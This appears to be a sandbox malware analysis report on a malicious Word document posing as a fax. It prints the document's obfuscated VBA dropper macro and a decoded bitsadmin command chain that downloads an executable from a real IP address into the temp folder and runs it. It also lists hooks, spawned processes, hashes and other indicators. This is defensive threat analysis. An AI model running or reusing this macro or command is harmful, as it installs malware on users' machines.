'Dolor aliqua ut nisi veniam qui elit. Nostrud do laborum eiusmod duis magna fugiat sit fugiat Lorem occaecat.
'Anim ad cillum et dolore et pariatur ut elit commodo dolor voluptate laborum. Enim veniam pariatur cupidatat id esse est quis dolore nulla fugiat officia voluptate ea anim.
v152021 = Val(Mid(v575024, 2, 2))
'Esse ea ipsum nulla aute nostrud aute eiusmod aliquip id. Magna duis exercitation do et id.
'Est incididunt consequat nostrud eiusmod laborum esse minim eu deserunt duis deserunt.
'Reprehenderit et dolore veniam ea cupidatat sint incididunt aute consectetur velit dolore laboris elit. Dolore elit fugiat id do.
v615031 = Asc(Mid(v758456, v152021, 1))
v135778 = v349656 + v877340
'Fugiat labore incididunt velit esse consectetur sunt Lorem dolor enim sunt.
v135778 = v135778 + v349656
v349656 = Tan(v349656)
'Eiusmod anim culpa amet est reprehenderit sit consequat.
v572717 = f245997(v240427)
v349656 = Cos(v349656)
'Do duis ullamco aute ullamco fugiat.
'Occaecat tempor id qui reprehenderit Lorem duis veniam ipsum laboris quis laborum duis. Quis do in anim nostrud irure.
'Eiusmod sint esse qui laboris sit ad.
v847141 = Split(v572717, "@")
'Officia aliquip dolore dolor culpa nulla anim incididunt consequat voluptate ipsum. Magna in ex mollit laborum voluptate qui qui id consectetur enim elit exercitation minim nulla.
v349656 = v562180 + v877340
v135778 = v135778 + v562180
'Consectetur magna ullamco culpa nostrud commodo occaecat quis aliquip proident.
For i = 0 To (UBound(v847141) - LBound(v847141)) Step 1
v664867 = (v847141(i) Xor v615031)
v5727172 = v5727172 + CStr(Chr(v664867))
Next i
v562180 = Int(v877340)
v135778 = Asc(v71433)
'Elit voluptate et ullamco amet pariatur aliquip mollit.
v877340 = Sqr(v877340)
'Voluptate nisi ullamco aliqua mollit et cillum excepteur officia deserunt proident elit id.
v877340 = v562180 + v877340
'Consequat officia cillum tempor velit excepteur aliquip reprehenderit dolore ad deserunt. Culpa dolore culpa deserunt labore magna excepteur mollit mollit veniam fugiat non esse magna.
v877340 = v349656 + v349656
v877340 = v349656 + v349656
v572717 = f245997(v5727172)
v135778 = v135778 - v562180
'Sint ut enim est occaecat et esse.
'Aliquip incididunt ullamco aliqua nostrud proident laborum eiusmod ad commodo irure. Dolor est ea excepteur est non ipsum sunt laboris et.
v135778 = v349656 + v877340
v135778 = v562180 + v562180
v349656 = v349656 + v349656
'Cupidatat irure cupidatat sunt commodo veniam do consectetur ut.
A1DX = Shell(Left(v572717, Len(v572717) - 2), 0)
'Sint et minim ipsum sint nisi ad Lorem cillum quis officia cupidatat. Mollit nulla ut aliqua dolore ex laboris occaecat excepteur sit occaecat commodo.
v135778 = v135778 + v349656
v349656 = v135778 + v135778
'Tempor do ut adipisicing duis quis do ipsum deserunt.
v562180 = Abs(v562180)
v562180 = v349656 + v135778
v562180 = Sqr(v349656)
'Sint aliqua velit sunt exercitation duis occaecat consequat.
v562180 = Sgn(v877340)
v877340 = v877340 + v349656
v562180 = RGB(194, 185, 103)
'Est Lorem qui cupidatat velit.
'Lorem quis enim non esse fugiat.
AS1 = 48
'Minim adipisicing mollit ullamco aliqua enim nulla dolore ullamco irure irure.
v135778 = v135778 + v349656
'Enim qui culpa deserunt magna. Sunt ullamco incididunt sint laboris velit.
'Irure Lorem aliquip ea magna irure est. Ullamco est magna duis irure consectetur.
v135778 = v562180 + v562180
v877340 = v562180 + v135778
v349656 = v562180 + v349656
'Culpa ad irure aliqua reprehenderit enim exercitation ipsum exercitation tempor adipisicing mollit cupidatat. Ad sunt voluptate cillum tempor incididunt commodo sunt ea aliqua irure velit do minim aliquip.
'Aute ullamco elit nostrud magna cillum voluptate irure esse mollit incididunt dolor velit non. Consequat veniam ut amet est.
v349656 = v877340 + v562180
'Incididunt minim ullamco dolore duis non exercitation consequat.
'Nulla ut eiusmod amet deserunt ut sunt est esse ullamco magna. Proident non eiusmod anim labore proident laboris minim ea anim enim culpa.
'Incididunt velit ad id deserunt. Ipsum laborum laboris amet adipisicing ipsum velit anim dolore dolore culpa irure.
'Aliquip sunt ad ex sunt aute tempor do amet.
'Consequat non ex sint enim duis tempor nisi est anim excepteur occaecat qui.
'Ex officia laboris enim anim ex fugiat ipsum. Magna ipsum nisi nulla aute aute id enim irure et elit quis.
'Ex fugiat fugiat elit pariatur eu laboris laboris ut laboris magna dolore adipisicing.
v135778 = v562180 - v135778
'Adipisicing et nostrud excepteur est voluptate non. Dolore id ipsum laborum magna elit aliquip quis.
'Sunt in consequat dolor exercitation mollit aliquip Lorem est sint consectetur sunt. Aute labore exercitation commodo incididunt incididunt velit culpa enim laboris qui non sint occaecat non.
v349656 = v135778 + v562180
'Minim exercitation culpa laborum ex id. Aliquip exercitation ex laborum ipsum anim.
v135778 = v349656 + v877340
End Function
Function f245997(ByVal v100243)
On Error Resume Next
Dim v269444 As Variant, v376987 As Variant, v842208 As Variant, v330126 As Variant, v151497 As String, v668744 As String, v335244 As String, Var_5 As Variant
v151497 = "V29fCUC1YatOjF9SVlkFdXokxfcKf9axvix8QEZZNSEnQD3marcfNJHpp73VSj9BkUiL75ZhNl4KYPb2Lo3a1IUA7devkK2sSoJAsYWQeqSs81kjjZZni7jyg9wTSgkLxxQW8zVwxwKYbvFOivPkWSm3518d2YAyEc37r46OBxrKDfFWHZcEwIgFq5dh7rggZDsi0qSNwYliTDntOpbiF7DZjHWUk4gKFBFB6EFX5a6FcKIR60yxrJCQhsvZkTkJ3g0J3OVAPgwjByViGvOFxESXitzLz1isyVQt758Si2yBmJcogorwm4SWSEecbNj6n9rb5CIg"
v335244 = "CWJ9vAgSyr52WbXtI278AXLk3RPATJ6AkNVnIp8AymgG4EDXh5AhgZz9hAFP87xAuovrxr8NkDuvOST0Ldu9JjlDuFcANaP183a8rdUuTBOUtwm6A9XGrYvtDX7x5bhpirPaSl8aSWFv24fk1K5hJlEj2TIpNjXfyKWVpdxRQ7hcsfVLTDY6CGSg3sG4tIm90NB1XovSxBa6C8gcgtq6GDWkL"
v668744 = "Jhlk3JfDkGkvuoiSJQuIiYhXTW94X6xzKhFkuHhF7Kem2PzLbQABDIFPAlmGb6Gr7Dlur28AmYhEg0Q2onfbasnrwJmm4LSJSrwhSqdI7LtcSj6SOUV8qOXQLesefEk"
v269444 = "91"
v376987 = "27"
v330126 = "50"
v842208 = "31"
v216871 = "60"
v330126 = v842208 - v269444
v216871 = v269444 - v269444
'Veniam culpa tempor duis laborum cillum aute excepteur mollit culpa.
v376987 = v216871 + v842208
'Consequat in velit nostrud sit commodo ut enim. Fugiat laborum do veniam reprehenderit consectetur ullamco et nisi in quis.
Dim v814889 As String
'Exercitation aute anim in pariatur veniam laboris quis. Labore est officia id voluptate nisi fugiat reprehenderit cupidatat quis aute.
v269444 = v269444 + v842208
'Magna elit reprehenderit cillum et nulla eiusmod eiusmod. Magna eiusmod dolore amet laboris pariatur sunt anim reprehenderit anim qui fugiat.
v814889 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
Dim v709711
Dim v272008
v842208 = Tan(v269444)
v330126 = v842208 + v330126
'Ad sit anim magna nulla. Ipsum magna id aliqua est culpa excepteur officia et dolor et et.
v269444 = v269444 + v330126
v330126 = v269444 - v376987
Dim v776342, v754466
Dim v442221, v234125, v97083, v875027
Dim v861160, v452150, Byte3
'Fugiat labore do elit eu.
v216871 = Sqr(v330126)
'Nisi quis est ea eu culpa eiusmod reprehenderit cupidatat nisi.
If Len(v100243) Mod 4 > 0 Then v100243 = v100243 & String(4 - (Len(v100243) Mod 4), " ")
v709711 = ""
v376987 = v216871 + v216871
'Est aute est mollit fugiat ut ex ut esse culpa.
v376987 = v216871 + v269444
v376987 = v216871 + v269444
For v272008 = 1 To Len(v100243) Step 4
v754466 = ""
v776342 = Mid(v100243, v272008, 4)
'Ipsum adipisicing amet duis eiusmod est anim veniam nisi eu nostrud. Et ea elit cillum pariatur amet fugiat sit minim elit ut dolore dolore.
v376987 = Abs(v216871)
'Incididunt sunt occaecat fugiat mollit do.
'Incididunt duis magna est eu ad qui labore ipsum dolore ullamco nisi eu dolor.
v442221 = InStr(v814889, Mid(v776342, 1, 1)) - 1
v234125 = InStr(v814889, Mid(v776342, 2, 1)) - 1
v216871 = v330126 + v216871
'Cillum officia ea aliquip duis minim qui.
v376987 = v842208 + v376987
v330126 = v330126 + v269444
'Nulla ut consequat ut ipsum in deserunt culpa velit minim cillum id. Non officia ipsum ad officia ullamco fugiat duis enim Lorem et enim.
v97083 = InStr(v814889, Mid(v776342, 3, 1)) - 1
v875027 = InStr(v814889, Mid(v776342, 4, 1)) - 1
v861160 = Chr(((v234125 And 48) \ 16) Or (v442221 * 4) And &HFF)
v452150 = v754466 & Chr(((v97083 And 60) \ 4) Or (v234125 * 16) And &HFF)
'Voluptate quis magna do ipsum sunt ad sunt excepteur dolore laboris consequat magna mollit. Cupidatat cillum laborum laboris amet ex amet ad adipisicing.
'Nisi ipsum officia do eiusmod.
v376987 = Tan(v842208)
v216871 = v842208 - v269444
Byte3 = Chr((((v97083 And 3) * 64) And &HFF) Or (v875027 And 63))
v754466 = v861160 & v452150 & Byte3
'Ad ut adipisicing culpa aute non occaecat incididunt quis ex ut ad eu. Lorem in laboris ea laborum aute est culpa incididunt quis duis officia laborum dolor nostrud.
v216871 = v842208 - v842208
'Nulla anim ad culpa ea. Esse enim irure ea Lorem ut magna amet duis.
'Lorem et occaecat dolore velit et. Sit aliqua fugiat cupidatat sunt aliqua fugiat et tempor aute.
v842208 = Int(v216871)
v709711 = v709711 + v754466
Next
v842208 = v330126 + v216871
v216871 = v216871 + v330126
v330126 = v269444 + v216871
'Do Lorem adipisicing duis eu in sint excepteur ipsum eu quis excepteur consequat. Fugiat et aliqua tempor eiusmod esse pariatur consectetur amet tempor exercitation laborum deserunt irure.
'Nulla excepteur nulla consequat laborum fugiat nulla do aliquip pariatur commodo eiusmod ex.
f245997 = Left(v709711, Len(v709711) - 1)
End Function
Function f624191() As Long
On Error Resume Next
Dim v589425 As String, v942571 As String, v88596 As Variant, v92129 As Variant, v364689 As String, v711536 As Variant, v536710 As Variant, Var_5 As Variant
v942571 = "EgZKyNWnCPmGF9QUWtnsjpaO96BrRkRifJicfZzfnL2jBX3A0Vt1r1ZFRzTRSns0V8HpvYYE3F9trjomUzT1djxO1SbWFNg349CvHmoOifF3NCWREkZ85SXR7umpdBgPZKQQXDVh4HQBXxJVUCERoleJRbIBhD6pzX5J2h8eyatF5QzuuK1AnpJv9iw5K5H3gLn7sgC1AooZdIvOOigWbqswUCCC3rKdYdoLDBvhAgtQ8l85AlSfSBHCcII6pbaeICyRVhPZZ3FLQJwePyjiKuXSkj7NZXR8nusLIuK5ufHbQ1dFW80X7VyV8ZXEe0iGHZ0JErHa2pzkI8k8RJLzK7jT2Xeagk"
v589425 = "bLNvyNY2cc1ahUXBInXeePR5PxJmPikDpOrmy91d0cAjgBWo3FZ4uhvY4wn2ZQCn3UGKkkjqRc3oIi8fKDhgYSPscXeOdyW2bxJoevWeQyJp1FFC889c3oukDV444yoViRhW4qlHtDpPvOzyczQj4sisuRNBQ7SugnDBGRq0mosvWHfXmegc9RQFygzG6PmHi94Ow3aaUwhsaFcBC7pWR5DVg1lpTX4XIbwNy8Q7XnbH5Vytj41avGbbGrQSHS2qISQmETHf7PxvGJ1ONpaVuffxmqH0S2jjTurEEgUKEjViyOmd8RxCY0WUHPrbAKQjtvVRmoQTCmuh7WKPvP7bhSBIXLUeepgrwoCve0w0mix14HWkd25dDLsHUAoTylma1UtHxxdNEJ78ltQQGgc6a5rxit"
v364689 = "ZtfYBoTlYuZ3ZHAOBm67PzsT0dinL7YGdgglueNslcQsir7C6Q5YFeFwN5bCyb20KtHAg4uhVm9WRtT2okJpdIa4uFLmwz2etdfsER0friGemY3lLD5YQB8Ns7RJXxpU0esKKs7qsBXjIFNUNNRb8"
v536710 = "97"
v711536 = "32"
v88596 = "10"
v92129 = "21"
v647557 = "42"
'Officia eu id eu cupidatat duis aliquip. Commodo deserunt anim officia excepteur id excepteur enim ut sint ut ut excepteur aliquip voluptate.
v92129 = v536710 - v647557
v536710 = v536710 + v92129
f624191 = 1
End Function" - source
- Static Parser
- relevance
- 10/10
-
Creates a writable file in a temporary directory
- details
- "WINWORD.EXE" created file "%TEMP%\~DF4B30B65BF4E6A9A3.TMP"
- source
- API Call
- relevance
- 1/10
-
Creates mutants
- details
-
"\Sessions\1\BaseNamedObjects\Global\552FFA80-3393-423d-8671-7BA046BB5906"
"Global\MTX_MSO_Formal1_S-1-5-21-4162757579-3804539371-4239455898-1000"
"Local\10MU_ACBPIDS_S-1-5-5-0-58974"
"Global\552FFA80-3393-423d-8671-7BA046BB5906"
"Local\ZonesCounterMutex"
"Local\ZonesCacheCounterMutex"
"Local\ZoneAttributeCacheCounterMutex"
"Local\10MU_ACB10_S-1-5-5-0-58974"
"Local\ZonesLockedCacheCounterMutex"
"Global\MTX_MSO_AdHoc1_S-1-5-21-4162757579-3804539371-4239455898-1000"
"\Sessions\1\BaseNamedObjects\Local\10MU_ACBPIDS_S-1-5-5-0-58974"
"\Sessions\1\BaseNamedObjects\Local\10MU_ACB10_S-1-5-5-0-58974"
"\Sessions\1\BaseNamedObjects\Local\ZonesCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\ZoneAttributeCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\ZonesCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\ZonesLockedCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Global\MTX_MSO_Formal1_S-1-5-21-4162757579-3804539371-4239455898-1000"
"\Sessions\1\BaseNamedObjects\Global\MTX_MSO_AdHoc1_S-1-5-21-4162757579-3804539371-4239455898-1000" - source
- Created Mutant
- relevance
- 3/10
-
Loads rich edit control libraries
- details
- "WINWORD.EXE" loaded module "%COMMONPROGRAMFILES%\microsoft shared\OFFICE14\RICHED20.DLL" at 68AB0000
- source
- Loaded Module
-
Logged script engine calls
- details
- "WINWORD.EXE" called ".Shell" with result: "1" ...
- source
- API Call
- relevance
- 10/10
-
Process launched with changed environment
- details
- Process "cmd.exe" (Show Process) was launched with new environment variables: "WecVersionForRosebud.C00="4""
- source
- Monitored Target
- relevance
- 10/10
-
Runs shell commands
- details
- "/c bitsadmin /transfer j1 http://185.81.113.106/L33LMj7.exe %TEMP%/1.exe &bitsadmin /create /download j2 &bitsadmin /addfile j2 http://185.81.113.106/indexsdfgfdsafdefsdd.php %TEMP%/1.txt &bitsadmin /setcustomheaders j2 User-Agent:Mozilla/4.0 &bitsadmin /resume j2 &bitsadmin /complete j2 && start %TEMP%/1.exe" on 2017-12-7.16:37:02.781
- source
- Monitored Target
- relevance
- 5/10
-
Scanning for window names
- details
-
"WINWORD.EXE" searching for class "mspim_wnd32"
"WINWORD.EXE" searching for class "NetUICtrlNotifySink"
"WINWORD.EXE" searching for class "REListbox20W"
"WINWORD.EXE" searching for class "OfficeTooltip"
"WINWORD.EXE" searching for class "MsoCommandBarPopup"
"WINWORD.EXE" searching for class "MSOBALLOON"
"WINWORD.EXE" searching for class "MsoHelp10"
"WINWORD.EXE" searching for class "AgentAnim" - source
- API Call
- relevance
- 10/10
-
Spawns new processes
- details
-
Spawned process "cmd.exe" with commandline "/c bitsadmin /transfer j1 http://185.81.113.106/L33LMj7.exe %TEMP%/1.exe &bitsadmin /create /download j2 &bitsadmin /addfile j2 http://185.81.113.106/indexsdfgfdsafdefsdd.php %TEMP%/1.txt &bitsadmin /setcustomheaders j2 User-Agent:Mozilla/4.0 &bitsadmin /resume j2 &bitsadmin /complete j2 && start %TEMP%/1.exe" (Show Process)
Spawned process "bitsadmin.exe" with commandline "bitsadmin /transfer j1 http://185.81.113.106/L33LMj7.exe %TEMP%\1.exe" (Show Process)
Spawned process "bitsadmin.exe" with commandline "bitsadmin /create /download j2" (Show Process)
Spawned process "bitsadmin.exe" with commandline "bitsadmin /addfile j2 http://185.81.113.106/indexsdfgfdsafdefsdd.php %TEMP%\1.txt" (Show Process)
Spawned process "bitsadmin.exe" with commandline "bitsadmin /setcustomheaders j2 User-Agent:Mozilla/4.0" (Show Process)
Spawned process "bitsadmin.exe" with commandline "bitsadmin /resume j2" (Show Process)
Spawned process "bitsadmin.exe" with commandline "bitsadmin /complete j2" (Show Process) - source
- Monitored Target
- relevance
- 3/10
-
Contains embedded VBA macros
-
Installation/Persistance
-
Creates new processes
- details
- "WINWORD.EXE" is creating a new process (Name: "%WINDIR%\System32\cmd.exe", Handle: 1288)
- source
- API Call
- relevance
- 8/10
-
Dropped files
- details
-
"b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.LNK" has type "MS Windows shortcut Item id list present Points to a file or directory Has Relative path Archive ctime=Thu Dec 7 23:35:52 2017 mtime=Thu Dec 7 23:35:52 2017 atime=Thu Dec 7 23:36:10 2017 length=181248 window=hide"
"~$644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc" has type "data"
"urlref_http185.81.113.106L33LMj7.exe" has type "PE32 executable (GUI) Intel 80386 for MS Windows"
"index.dat" has type "data"
"~WRS{70621F97-B98F-44BB-BE39-FADAA03A35C7}.tmp" has type "data"
"~$Normal.dotm" has type "data" - source
- Binary File
- relevance
- 3/10
-
Opens the MountPointManager (often used to detect additional infection locations)
- details
- "WINWORD.EXE" opened "\Device\MountPointManager"
- source
- API Call
- relevance
- 5/10
-
Touches files in the Windows directory
- details
-
"WINWORD.EXE" touched file "C:\Windows\AppPatch\sysmain.sdb"
"WINWORD.EXE" touched file "C:\Windows\Globalization\Sorting\SortDefault.nls"
"WINWORD.EXE" touched file "C:\Windows\Fonts\StaticCache.dat"
"WINWORD.EXE" touched file "C:\Windows\System32\en-US\user32.dll.mui"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll"
"WINWORD.EXE" touched file "C:\Windows\System32\en-US\setupapi.dll.mui"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches"
"WINWORD.EXE" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Caches\cversions.1.db"
"WINWORD.EXE" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000c.db"
"WINWORD.EXE" touched file "C:\Windows\System32\rsaenh.dll"
"WINWORD.EXE" touched file "C:\Windows\System32\en-US\KernelBase.dll.mui"
"WINWORD.EXE" touched file "C:\Windows\System32\msxml6r.dll" - source
- API Call
- relevance
- 7/10
-
Creates new processes
-
Network Related
-
Found potential URL in binary/memory
- details
-
Pattern match: "http://schemas.openxmlformats.org/drawingml/2006/main"
Pattern match: "http://185.81.113.106/indexsdfgfdsafdefsdd.php"
Pattern match: "http://185.81.113.106/L33LMj7.exe" - source
- File/Memory
- relevance
- 10/10
-
Found potential URL in binary/memory
-
System Security
-
Hooks API calls
- details
-
"SysFreeString@OLEAUT32.DLL" in "WINWORD.EXE"
"SysAllocStringByteLen@OLEAUT32.DLL" in "WINWORD.EXE"
"OleLoadFromStream@OLE32.DLL" in "WINWORD.EXE"
"VariantChangeType@OLEAUT32.DLL" in "WINWORD.EXE"
"VariantClear@OLEAUT32.DLL" in "WINWORD.EXE" - source
- Hook Detection
- relevance
- 10/10
-
Queries sensitive IE security settings
- details
- "WINWORD.EXE" (Path: "HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SECURITY"; Key: "DISABLESECURITYSETTINGSCHECK")
- source
- Registry Access
- relevance
- 8/10
-
Hooks API calls
-
Unusual Characteristics
-
Installs hooks/patches the running process
- details
-
"WINWORD.EXE" wrote bytes "b800000000663d33c0ba3400480068dcf57868c3" to virtual address "0x057FD10C"
"WINWORD.EXE" wrote bytes "e99a54b9ef" to virtual address "0x75FA3E59" ("SysFreeString@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "b811110000663d33c0ba0cd07e0568dcf57868c3" to virtual address "0x057FD12C"
"WINWORD.EXE" wrote bytes "b800000000663d33c0bab400480068dcf57868c3" to virtual address "0x057FD14C"
"WINWORD.EXE" wrote bytes "b800000000663d33c0baf400480068dcf57868c3" to virtual address "0x057FD16C"
"WINWORD.EXE" wrote bytes "b800000000663d33c0ba3401480068dcf57868c3" to virtual address "0x057FD18C"
"WINWORD.EXE" wrote bytes "e96033baef" to virtual address "0x75FA4731" ("SysAllocStringByteLen@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "b800000000663d33c0ba7401480068dcf57868c3" to virtual address "0x057FD1AC"
"WINWORD.EXE" wrote bytes "ccf34baf" to virtual address "0x68AF9904" (part of module "RICHED20.DLL")
"WINWORD.EXE" wrote bytes "e9c53207ef" to virtual address "0x77076143" ("OleLoadFromStream@OLE32.DLL")
"WINWORD.EXE" wrote bytes "0883c40c" to virtual address "0x688F1F20" (part of module "GKWORD.DLL")
"WINWORD.EXE" wrote bytes "e92399bcef" to virtual address "0x75FA5DEE" ("VariantChangeType@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "e99e489def" to virtual address "0x76133D01" ("SetUnhandledExceptionFilter@KERNEL32.DLL")
"WINWORD.EXE" wrote bytes "86bdfbe1" to virtual address "0x615942C4" (part of module "VBE7.DLL")
"WINWORD.EXE" wrote bytes "259528af" to virtual address "0x66D678E4" (part of module "OART.DLL")
"WINWORD.EXE" wrote bytes "904b45af" to virtual address "0x68C010AC" (part of module "MSPTLS.DLL")
"WINWORD.EXE" wrote bytes "60cffdaf" to virtual address "0x2F611B94" (part of module "WINWORD.EXE")
"WINWORD.EXE" wrote bytes "df4d27af" to virtual address "0x6957F530" (part of module "WWLIB.DLL")
"WINWORD.EXE" wrote bytes "e93655baef" to virtual address "0x75FA3EAE" ("VariantClear@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "b800000000663d33c0baf4ff470068dcf57868c3" to virtual address "0x057FD0EC" - source
- Hook Detection
- relevance
- 10/10
-
Reads information about supported languages
- details
-
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000409")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000401")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "0000040D")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "0000041E")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "0000042A")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000439")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000420")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000429")
"WINWORD.EXE" (Path: "HKCU\CONTROL PANEL\INTERNATIONAL"; Key: "NUMSHAPE")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000402")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000403")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000404")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000405")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000406")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000407")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000408") - source
- Registry Access
- relevance
- 3/10
-
Installs hooks/patches the running process
File Details
fax-120717_094384372834792.doc
- Filename
- fax-120717_094384372834792.doc
- Size
- 177KiB (181248 bytes)
- Type
- doc office
- Description
- Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Author: adm, Template: Normal.dotm, Last Saved By: adm, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Total Editing Time: 07:00, Create Time/Date: Thu Sep 28 14:04:00 2017, Last Saved Time/Date: Wed Sep 27 14:54:00 2017, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
- Architecture
- WINDOWS
- SHA256
- b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17
- MD5
- 9707cbff1947e82bc5cbf6de5d0eb880
- SHA1
- 298ca21d039307d977791d47b6eeb8e0dcddf7a2
Classification (TrID)
- 54.2% (.DOC) Microsoft Word document
- 32.2% (.DOC) Microsoft Word document (old ver.)
- 13.5% (.) Generic OLE2 / Multistream Compound File
Screenshots
Loading content, please wait...
Hybrid Analysis
Tip: Click an analysed process below to view more details.
Analysed 8 processes in total (System Resource Monitor).
-
WINWORD.EXE
/n "C:\b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc"
(PID: 3072)
-
cmd.exe
/c bitsadmin /transfer j1 http://185.81.113.106/L33LMj7.exe %TEMP%/1.exe &bitsadmin /create /download j2 &bitsadmin /addfile j2 http://185.81.113.106/indexsdfgfdsafdefsdd.php %TEMP%/1.txt &bitsadmin /setcustomheaders j2 User-Agent:Mozilla/4.0 &bitsadmin /resume j2 &bitsadmin /complete j2 && start %TEMP%/1.exe
(PID: 3768)
- bitsadmin.exe bitsadmin /transfer j1 http://185.81.113.106/L33LMj7.exe %TEMP%\1.exe (PID: 3728)
- bitsadmin.exe bitsadmin /create /download j2 (PID: 3808)
- bitsadmin.exe bitsadmin /addfile j2 http://185.81.113.106/indexsdfgfdsafdefsdd.php %TEMP%\1.txt (PID: 3848)
- bitsadmin.exe bitsadmin /setcustomheaders j2 User-Agent:Mozilla/4.0 (PID: 3868)
- bitsadmin.exe bitsadmin /resume j2 (PID: 3936)
- bitsadmin.exe bitsadmin /complete j2 (PID: 1512)
-
cmd.exe
/c bitsadmin /transfer j1 http://185.81.113.106/L33LMj7.exe %TEMP%/1.exe &bitsadmin /create /download j2 &bitsadmin /addfile j2 http://185.81.113.106/indexsdfgfdsafdefsdd.php %TEMP%/1.txt &bitsadmin /setcustomheaders j2 User-Agent:Mozilla/4.0 &bitsadmin /resume j2 &bitsadmin /complete j2 && start %TEMP%/1.exe
(PID: 3768)
Network Analysis
DNS Requests
No relevant DNS requests were made.
Contacted Hosts
No relevant hosts were contacted.
HTTP Traffic
No relevant HTTP requests were made.
Extracted Strings
Extracted Files
-
Malicious 1
-
-
urlref_http185.81.113.106L33LMj7.exe
- Size
- 64KiB (65536 bytes)
- Type
- peexe executable
- Description
- PE32 executable (GUI) Intel 80386, for MS Windows
- AV Scan Result
- Labeled as "QVM03.0.B013.Malware" (6/65)
- Context
- http://185.81.113.106/L33LMj7.exe
- MD5
- 5b0e06e3e896d541264a03abef5f30c7
- SHA1
- d4bb230f93c4b3982f4d56d698533d0b85ccb07e
- SHA256
- 48dc488125a342d278aee48cdf3069baf8743e035a5e1b33e2f253cb786a786d
-
-
Informative 5
-
-
b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.LNK
- Size
- 733B (733 bytes)
- Type
- lnk
- Description
- MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Dec 7 23:35:52 2017, mtime=Thu Dec 7 23:35:52 2017, atime=Thu Dec 7 23:36:10 2017, length=181248, window=hide
- Runtime Process
- WINWORD.EXE (PID: 3072)
- MD5
- 7f497955d1de7de9b083668c30996259
- SHA1
- eb2d2f848f0fb194ca7ab651d30637b2f9fa38fd
- SHA256
- 68d998562e2ad5d3cc4c74d2f610f712aed0231b44dcd18ea9cb5514b529b7cb
-
index.dat
- Size
- 257B (257 bytes)
- Type
- data
- Runtime Process
- WINWORD.EXE (PID: 3072)
- MD5
- cb5b91d14af602b02bb39c0078c18cc2
- SHA1
- cbe5426e35b333e044d6edea42fec77abaeb3f0b
- SHA256
- c402b8881f86d3f31973edc93ae76f3586601b025aa4bf2fe7f59e0d6652af72
-
~$Normal.dotm
- Size
- 162B (162 bytes)
- Type
- data
- Runtime Process
- WINWORD.EXE (PID: 3072)
- MD5
- 73fb0c9920d73c23284d77feb3172218
- SHA1
- 29b553daa73a0bb2cd1889f8793fcbfa1844bcc6
- SHA256
- 7a00d1a381743ff56f7ca883b82498e0873d1650caf8b99cd58959ad080e8504
-
~WRS{70621F97-B98F-44BB-BE39-FADAA03A35C7}.tmp
- Size
- 1KiB (1024 bytes)
- Type
- data
- Runtime Process
- WINWORD.EXE (PID: 3072)
- MD5
- 5d4d94ee7e06bbb0af9584119797b23a
- SHA1
